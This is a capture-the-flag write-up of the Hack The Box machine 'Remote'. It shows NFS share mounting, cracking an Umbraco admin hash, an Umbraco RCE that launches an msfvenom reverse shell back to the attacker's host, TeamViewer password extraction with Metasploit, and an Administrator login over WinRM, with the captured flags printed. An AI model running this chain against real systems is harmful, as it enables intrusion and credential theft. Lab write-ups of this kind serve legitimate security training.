Remote

TL;DR

  • Mount NFS share and find credentials to login as admin on Umbraco (CMS)
  • Exploit RCE on Umbraco to get a shell
  • Find Team Viewer credentials and connect as Administrator with Windows Remote Management

User.txt

Reconnaissance

Let’s start by a Nmap scan:

magnussen@funcMyLife:~/remote$ nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN remote.txt 10.10.10.180
# Nmap 7.60 scan initiated Fri Jul 10 12:56:46 2020 as: nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN remote.txt remote.htb
Increasing send delay for 10.10.10.180 from 0 to 5 due to 142 out of 473 dropped probes since last increase.
Increasing send delay for 10.10.10.180 from 5 to 10 due to 181 out of 601 dropped probes since last increase.
Warning: 10.10.10.180 giving up on port because retransmission cap hit (10).
Nmap scan report for remote.htb (10.10.10.180)
Host is up, received echo-reply ttl 127 (0.18s latency).
Scanned at 2020-07-10 12:56:46 CEST for 217s
Not shown: 53899 closed ports, 11621 filtered ports
Reason: 53899 resets and 11621 no-responses
PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 127 Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_  SYST: Windows_NT
80/tcp    open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       syn-ack ttl 127 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3         2049/udp  nfs
|   100003  2,3,4       2049/tcp  nfs
|   100005  1,2,3       2049/tcp  mountd
|   100005  1,2,3       2049/udp  mountd
|   100021  1,2,3,4     2049/tcp  nlockmgr
|   100021  1,2,3,4     2049/udp  nlockmgr
|   100024  1           2049/tcp  status
|_  100024  1           2049/udp  status
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 127
2049/tcp  open  mountd        syn-ack ttl 127 1-3 (RPC #100005)
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49678/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49679/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49680/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 45222/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 57430/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 33056/udp): CLEAN (Failed to receive data)
|   Check 4 (port 15893/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-07-10 13:04:43
|_  start_date: 1601-01-01 00:09:21

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul 10 13:00:23 2020 -- 1 IP address (1 host up) scanned in 217.56 seconds

So we find 5 useful services:

  • FTP (21)
  • IIS (80)
  • SMB (445)
  • RPCBind (2049)
  • WinRM (5985)

The website is some kind of blog.

Website

We can log in with anonymous:anonymous on the FTP server but there’s nothing interesting.

NFS

We saw a listening service on port 2049, let’s start by listing the NFS shares on the box.

NFS (Network File System) is a file system protocol allowing a user to access files over a network much like local storage is accessed. It’s build on the Open Network Computing Remote Procedure Call (ONC RPC) system.

magnussen@funcMyLife:~/remote$ showmount -e remote.htb
Export list for remote.htb:
/site_backups (everyone)

Nice, we have a share called site_backups that’s available to everyone. Let’s mount it and dig into it.

magnussen@funcMyLife:~/remote$ mount -o hard,nolock remote.htb:/site_backups ./nfs_mount/
magnussen@funcMyLife:~/remote$ ls -alh nfs_mount/
total 123K
drwx------ 2 nobody    4294967294 4,0K févr. 23 19:35 .
drwxrwxr-x 4 magnussen magnussen  4,0K juil.  9 15:10 ..
drwx------ 2 nobody    4294967294   64 févr. 20 18:16 App_Browsers
drwx------ 2 nobody    4294967294 4,0K févr. 20 18:17 App_Data
drwx------ 2 nobody    4294967294 4,0K févr. 20 18:16 App_Plugins
drwx------ 2 nobody    4294967294   64 févr. 20 18:16 aspnet_client
drwx------ 2 nobody    4294967294  48K févr. 20 18:16 bin
drwx------ 2 nobody    4294967294 8,0K févr. 20 18:16 Config
drwx------ 2 nobody    4294967294   64 févr. 20 18:16 css
-rwx------ 1 nobody    4294967294  152 nov.   1  2018 default.aspx
-rwx------ 1 nobody    4294967294   89 nov.   1  2018 Global.asax
drwx------ 2 nobody    4294967294 4,0K févr. 20 18:16 Media
drwx------ 2 nobody    4294967294   64 févr. 20 18:16 scripts
drwx------ 2 nobody    4294967294 8,0K févr. 20 18:16 Umbraco
drwx------ 2 nobody    4294967294 4,0K févr. 20 18:16 Umbraco_Client
drwx------ 2 nobody    4294967294 4,0K févr. 20 18:16 Views
-rwx------ 1 nobody    4294967294  28K févr. 20 06:57 Web.config

Cool, we have access to a backup of the website. If we dig into it, we find an interesting file: App_Data/Umbraco.sdf.

If we check its content we find some credentials:

magnussen@funcMyLife:~/remote$ head nfs_mount/App_Data/Umbraco.sdf
��V�t�t�y���Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d��׃rf�u�rf�v�rf���rf����X�v�������adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50��BiIf�hVg�v�rf�hVg����X�v�������adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f�[{"alias":"umbIntroIntroduction","completed":false,"disabled":true}]��?�g�.og���g����X�v�������smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e��?�g�Ag�.og�Og����Y�w�������ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749��~�
g�)

After breaking the hash (b8be16afba8c314ad33d812f22a04991b90e2aaa) with crackstation we find: baconandcheese.

We can log in to http://http://remote.htb/Umbraco with: admin@htb.local:baconandcheese.

RCE on Umbraco

Once we’re log in, we find Umbraco’s version: 7.12.4.

Website

If we google for exploit, we find the following script: https://github.com/noraj/Umbraco-RCE.

Let’s start by creating a reverse shell executable with msfvenom:

magnussen@funcMyLife:~/remote$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.15.158 LPORT=7777 -f exe > magnussen.exe

Let’s upload our reverse shell on the server by using http://remote.htb/Umbraco#/media.

Media

Now we have to locate our file on the box and execute our reverse shell:

magnussen@funcMyLife:~/remote$ python3 exploit.py -u "admin@htb.local" -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a '-NoProfile -Command ls C:/inetpub/wwwroot/Media/1033'


    Directory: C:\inetpub\wwwroot\Media\1033


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        7/10/2020   1:31 PM          73802 magnussen.exe   

magnussen@funcMyLife:~/remote$ msfconsole
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.15.158
LHOST => 10.10.15.158
msf5 exploit(multi/handler) > set LPORT 7777
LPORT => 7777
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.15.158:7777
magnussen@funcMyLife:~/remote$ python3 exploit.py -u "admin@htb.local" -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a 'C:/inetpub/wwwroot/Media/1033/magnussen.exe'
msf5 exploit(multi/handler) >
[*] Started reverse TCP handler on 10.10.15.158:7777
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.10.180
[*] Command shell session 1 opened (10.10.15.158:7777 -> 10.10.10.180:49687) at 2020-07-10 19:31:13 +0200
C:\windows\system32\inetsrv>

Yeah! We have a shell, let’s go get that user.txt.

C:\windows\system32\inetsrv> cd c:\Users\Public
c:\Users\Public>type user.txt
type user.txt
2cc0eb5c564ee64f6f01d6273d920b53

I AM ROOT

Teamviewer & WinRM

Just have to privesc now, first of all let’s check the running processes:

c:\Users\Public> tasklist
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0                            0          8 K
System                           4                            0        148 K
Registry                       104                            0     23,208 K
smss.exe                       300                            0      1,220 K
csrss.exe                      408                            0      5,552 K
wininit.exe                    488                            0      6,820 K
csrss.exe                      496                            1      4,736 K
winlogon.exe                   588                            1     14,260 K
services.exe                   628                            0      9,976 K
lsass.exe                      648                            0     13,980 K
svchost.exe                    772                            0      3,756 K
svchost.exe                    796                            0     14,524 K
fontdrvhost.exe                820                            0      4,024 K
fontdrvhost.exe                828                            1      4,284 K
svchost.exe                    916                            0     10,224 K
svchost.exe                    960                            0      6,992 K
dwm.exe                        268                            1     32,976 K
svchost.exe                    564                            0      8,060 K
svchost.exe                   1032                            0      5,864 K
svchost.exe                   1092                            0     11,580 K
svchost.exe                   1156                            0      5,624 K
svchost.exe                   1224                            0     15,400 K
vmacthlp.exe                  1300                            0      6,340 K
svchost.exe                   1344                            0      7,808 K
svchost.exe                   1372                            0      7,396 K
svchost.exe                   1388                            0      5,520 K
svchost.exe                   1396                            0     11,048 K
svchost.exe                   1416                            0      9,012 K
svchost.exe                   1424                            0      7,404 K
svchost.exe                   1568                            0      5,708 K
svchost.exe                   1604                            0     14,052 K
svchost.exe                   1640                            0     11,400 K
svchost.exe                   1668                            0      8,804 K
svchost.exe                   1676                            0      8,456 K
svchost.exe                   1768                            0      8,108 K
svchost.exe                   1792                            0      8,476 K
svchost.exe                   1944                            0      6,912 K
svchost.exe                   1992                            0      7,716 K
svchost.exe                   1468                            0     15,748 K
svchost.exe                   2084                            0      8,084 K
svchost.exe                   2108                            0      8,412 K
svchost.exe                   2276                            0      7,776 K
svchost.exe                   2284                            0      7,268 K
spoolsv.exe                   2668                            0     16,268 K
svchost.exe                   2720                            0     10,736 K
svchost.exe                   2728                            0     12,284 K
svchost.exe                   2736                            0     24,904 K
svchost.exe                   2756                            0     12,324 K
svchost.exe                   2784                            0     19,920 K
inetinfo.exe                  2796                            0     17,448 K
svchost.exe                   2868                            0      6,532 K
svchost.exe                   2888                            0      8,296 K
svchost.exe                   2952                            0      6,176 K
svchost.exe                   2964                            0      5,348 K
vmtoolsd.exe                  2972                            0     18,104 K
VGAuthService.exe             2980                            0     10,264 K
svchost.exe                   3000                            0     12,240 K
svchost.exe                   3060                            0      7,364 K
TeamViewer_Service.exe        1204                            0     18,724 K
svchost.exe                   1720                            0     10,708 K
MsMpEng.exe                   2080                            0    134,228 K
svchost.exe                   2384                            0     11,668 K
svchost.exe                   3088                            0     12,584 K
nfssvc.exe                    3380                            0      5,328 K
svchost.exe                   3692                            0     12,156 K
dllhost.exe                   3396                            0     13,336 K
msdtc.exe                     4376                            0     10,440 K
WmiPrvSE.exe                  4920                            0     18,384 K
LogonUI.exe                   4936                            1     42,808 K
svchost.exe                   5872                            0      5,388 K
w3wp.exe                      5316                            0    349,928 K
svchost.exe                   1620                            0     12,044 K
svchost.exe                    992                            0     14,124 K
svchost.exe                    868                            0     13,000 K
svchost.exe                    352                            0     33,100 K
SearchIndexer.exe             1120                            0     19,932 K
svchost.exe                   2676                            0     11,528 K
svchost.exe                   1776                            0     10,168 K
svchost.exe                   2772                            0      5,864 K
svchost.exe                    816                            0      7,376 K
magnussen.exe                 1080                            0      3,724 K
cmd.exe                       2828                            0      4,748 K
conhost.exe                   2692                            0     10,840 K
WmiPrvSE.exe                  3096                            0      8,256 K
tasklist.exe                  4944                            0      7,828 K

Mmmh, the TeamViewer service might be interesting.

While searching for exploit on Teamviewer I’ve found this really amazing article.

We might be able to retrieve TeamViewer password as the AES key is known, we even have a metasploit exploit for that. Let’s run it!

meterpreter > run post/windows/gather/credentials/teamviewer_passwords

[*] Finding TeamViewer Passwords on REMOTE
[+] Found Unattended Password: !R3m0te!
[+] Passwords stored in: /home/magnussen/.msf4/loot/20200710194708_default_10.10.10.180_host.teamviewer__202492.txt
[*] <---------------- | Using Window Technique | ---------------->
[*] TeamViewer's language setting options are ''
[*] TeamViewer's version is ''
[-] Unable to find TeamViewer's process

Yes! We have the password (!R3m0te!)!

We saw earlier that WinRM is available, let’s connect with evilWinRM by using this password with the Administrator account.

WinRM (Windows Remote Management) is a built-in remote management protocol that allows us to execute commands remotely.

magnussen@funcMyLife:~/remote$ ./evil-winrm.rb -i 10.10.10.180 -u Administrator -p '!R3m0te!'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
remote\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        7/10/2020   1:18 PM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
6e9e9a86aa92b84a6ebd307b78691bc6

I AM ROOT!

This was a great box, not very difficult but I’ve learned a lot on Windows thanks to it! Thanks Mrb3n for the box!